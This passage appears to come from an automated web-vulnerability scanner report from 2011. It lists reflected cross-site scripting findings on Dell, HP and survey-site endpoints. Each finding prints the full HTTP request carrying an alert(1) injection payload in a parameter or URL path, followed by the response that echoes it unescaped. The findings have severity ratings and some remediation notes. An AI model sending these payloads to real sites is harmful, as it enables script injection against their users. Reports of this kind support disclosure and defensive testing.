GET /m2/dellinc/mbox/ajax?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153155747-78365&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=1&mbox=enus_ng&mboxId=0&mboxTime=1315135150946&profile.r=us&profile.c=us&profile.l=en&profile.s=bsd&profile.cs=04&profile.pn=&profile.pt=&profile.catid=2eb52'%3balert(1)//dfc1fb26081&profile.catpath=&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40 HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/JavaScript
Content-Length: 8951
Date: Sun, 04 Sep 2011 16:20:42 GMT
Server: Test & Target

var mboxCurrent = mboxFactories.get('default').get('enus_ng',0);mboxCurrent.setOffer(new mboxOfferAjax('<!-- Offer Id: 68329 --><!--\nID 155 - US BSD - browse ANAV layout\nID 406 - US BSD Browse Fran
...[SNIP]...
vs_pd_pages_recipe_c_406.html
// Dev: Anish John & Wolff

(function tnt(){
if(typeof $j === 'function'){

var turl = window.location.href;
       
       var pt = '';
       var catid = '2eb52';alert(1)//dfc1fb26081';
       
       if (pt=='franchise'){
           if(catid.indexOf("laptop")>
...[SNIP]...

3.17. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [profile.pn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/ajax

Issue detail

The value of the profile.pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7cbb'%3balert(1)//6aaa9f386df was submitted in the profile.pn parameter. This input was echoed as e7cbb';alert(1)//6aaa9f386df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/dellinc/mbox/ajax?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153155747-78365&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=1&mbox=enus_ng&mboxId=0&mboxTime=1315135150946&profile.r=us&profile.c=us&profile.l=en&profile.s=bsd&profile.cs=04&profile.pn=e7cbb'%3balert(1)//6aaa9f386df&profile.pt=&profile.catid=&profile.catpath=&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40 HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/JavaScript
Content-Length: 8951
Date: Sun, 04 Sep 2011 16:20:37 GMT
Server: Test & Target

var mboxCurrent = mboxFactories.get('default').get('enus_ng',0);mboxCurrent.setOffer(new mboxOfferAjax('<!-- Offer Id: 68329 --><!--\nID 155 - US BSD - browse ANAV layout\nID 406 - US BSD Browse Fran
...[SNIP]...


// Campaign: Temporary Implementation on moving ANAV up
// Offer: US BSD Browse ANAV Layout - Recipe A&B
// Dev: Anish John

(function(){

   var tnt_me = arguments.callee;
   var sc_pagename = 'e7cbb';alert(1)//6aaa9f386df';
   //console.log(sc_pagename);
   if (sc_pagename!= 'us:en:bsd:04:homepage:'){
       if(typeof $j === 'function'){
           $j(function(){
//commented out on 5/10/11 by CS to fix Enterprise n
...[SNIP]...

3.18. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [profile.pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/ajax

Issue detail

The value of the profile.pt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73ac0'%3balert(1)//12e44e77684 was submitted in the profile.pt parameter. This input was echoed as 73ac0';alert(1)//12e44e77684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/dellinc/mbox/ajax?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153155747-78365&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=1&mbox=enus_ng&mboxId=0&mboxTime=1315135150946&profile.r=us&profile.c=us&profile.l=en&profile.s=bsd&profile.cs=04&profile.pn=&profile.pt=73ac0'%3balert(1)//12e44e77684&profile.catid=&profile.catpath=&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40 HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/JavaScript
Content-Length: 8979
Date: Sun, 04 Sep 2011 16:20:39 GMT
Server: Test & Target

var mboxCurrent = mboxFactories.get('default').get('enus_ng',0);mboxCurrent.setOffer(new mboxOfferAjax('<!-- Offer Id: 68329 --><!--\nID 155 - US BSD - browse ANAV layout\nID 406 - US BSD Browse Fran
...[SNIP]...
nchise_links_to_3x_vs_pd_pages_recipe_c_406.html
// Dev: Anish John & Wolff

(function tnt(){
if(typeof $j === 'function'){

var turl = window.location.href;
       
       var pt = '73ac0';alert(1)//12e44e77684';
       var catid = '';
       
       if (pt=='franchise'){
           if(catid.indexOf("laptop")>
...[SNIP]...

3.19. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 1d9ac<script>alert(1)</script>ffab928f11c was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/dellinc/mbox/standard?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153150925-582363&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=2&mbox=enus_create1d9ac<script>alert(1)</script>ffab928f11c&mboxId=0&mboxTime=1315135150965&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40 HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315153150925-582363.19; Domain=dellinc.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 16:20:13 GMT; Path=/m2/dellinc
Content-Type: text/javascript
Content-Length: 207
Date: Sun, 04 Sep 2011 16:20:13 GMT
Server: Test & Target

mboxFactories.get('default').get('enus_create1d9ac<script>alert(1)</script>ffab928f11c',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315153150925-582363.19");

3.20. http://ecustomeropinions.com/survey/survey.php [data1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecustomeropinions.com
Path:   /survey/survey.php

Issue detail

The value of the data1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11b8d"style%3d"x%3aexpression(alert(1))"5507b297506 was submitted in the data1 parameter. This input was echoed as 11b8d"style="x:expression(alert(1))"5507b297506 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /survey/survey.php?sid=603736412&data1=5.5.0.11511b8d"style%3d"x%3aexpression(alert(1))"5507b297506&data2=xss.cx HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: ecustomeropinions.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: server=www18; path=/
Pragma: no-cache
P3P: CP="NOI DSP COR ADM DEV PSA PSD OUR IND COM NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="data1" value="5.5.0.11511b8d"style="x:expression(alert(1))"5507b297506" />
...[SNIP]...

3.21. http://h20180.www2.hp.com/apps/Nav [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h20180.www2.hp.com
Path:   /apps/Nav

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc170"%3balert(1)//5094ea54093 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc170";alert(1)//5094ea54093 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/Nav?h_pagetype=s-005&h_cc=us&h_lang=en&h_page=hpcom&h_product=top&h_client=test&fc170"%3balert(1)//5094ea54093=1 HTTP/1.1
Host: h20180.www2.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:11 GMT
Server: Apache
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 18:32:11 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 23112

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
...[SNIP]...
m below accordingly
cclang = "en"; // for Customer Care Search REMOVE and USe h_lang and h_cc
lang = "en"; // for global hp Search
cc = "us";
extravars="fc170";alert(1)//5094ea54093=1&lang=en&cc=us";//for extra parameters that are passed in url
if (document.myForm.search[0].checked)
top.location="http://www.hp.com/cgi-bin/cposupport/ccsearch/displayans?qry="+n
...[SNIP]...

3.22. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffcdd"><script>alert(1)</script>3d65e0e84c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /campusffcdd"><script>alert(1)</script>3d65e0e84c7/p/campusId/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:07 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:14 GMT
X-Cluster-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Connection: Close
Content-Length: 31053


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/campusffcdd"><script>alert(1)</script>3d65e0e84c7/p/campusId/10640/Graphic_arts.htm?printable=true">
...[SNIP]...

3.23. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 760e0"><script>alert(1)</script>07593cf9d0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /campus/p760e0"><script>alert(1)</script>07593cf9d0b/campusId/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:14 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:21 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Connection: Close
Content-Length: 30744


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/campus/p760e0"><script>alert(1)</script>07593cf9d0b/campusId/10640/Graphic_arts.htm?printable=true">
...[SNIP]...

3.24. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d0f5"><script>alert(1)</script>6549be04bdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /campus/p/campusId6d0f5"><script>alert(1)</script>6549be04bdf/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:20 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:27 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 38576
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>

HP Learning Cente
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/campus/p/campusId6d0f5"><script>alert(1)</script>6549be04bdf/10640/Graphic_arts.htm?campusId6d0f5%22%3E%3Cscript%3Ealert%281%29%3C=script%3E6549be04bdf&printable=true&10640=Graphic_arts.htm">
...[SNIP]...

3.25. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c48"><script>alert(1)</script>4211f41393e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /campus/p/campusId/1064047c48"><script>alert(1)</script>4211f41393e/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:26 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:33 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 38613
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>

HP Learning Cente
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/campus/p/campusId/1064047c48"><script>alert(1)</script>4211f41393e/Graphic_arts.htm?printable=true&script%3E4211f41393e=Graphic_arts.htm&campusId=1064047c48%22%3E%3Cscript%3Ealert%281%29%3C">
...[SNIP]...

3.26. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5bb3'-alert(1)-'d1d24f8133d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /campus/p/campusId/10640b5bb3'-alert(1)-'d1d24f8133d/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:29 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:36 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 38640
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>

HP Learning Cente
...[SNIP]...
<script type="text/javascript" language="JavaScript">
try {
Powered.WebAnalytics.addLinkClickHandlers();

Powered.WebAnalytics.recordPageView('10640b5bb3'-alert(1)-'d1d24f8133d');

} catch(err) {
}
</script>
...[SNIP]...

3.27. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6113c"><script>alert(1)</script>8529132865 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /campus/p/campusId/10640/Graphic_arts.htm6113c"><script>alert(1)</script>8529132865 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:32:36 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:46:43 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 56673
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm6113c"><script>alert(1)</script>8529132865?printable=true&Graphic_arts.htm6113c%22%3E%3Cscript%3Ealert%281%29%3C=script%3E8529132865&campusId=10640">
...[SNIP]...

3.28. http://h30187.www3.hp.com/howto_QL_courses.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /howto_QL_courses.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7261f"><script>alert(1)</script>4ba80ec5e10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /howto_QL_courses.jsp7261f"><script>alert(1)</script>4ba80ec5e10 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:33:38 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:47:45 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Connection: Close
Content-Length: 30876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/howto_QL_courses.jsp7261f"><script>alert(1)</script>4ba80ec5e10?printable=true">
...[SNIP]...

3.29. http://h30187.www3.hp.com/index.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /index.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca059"><script>alert(1)</script>af8ce681eb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.jspca059"><script>alert(1)</script>af8ce681eb5 HTTP/1.1
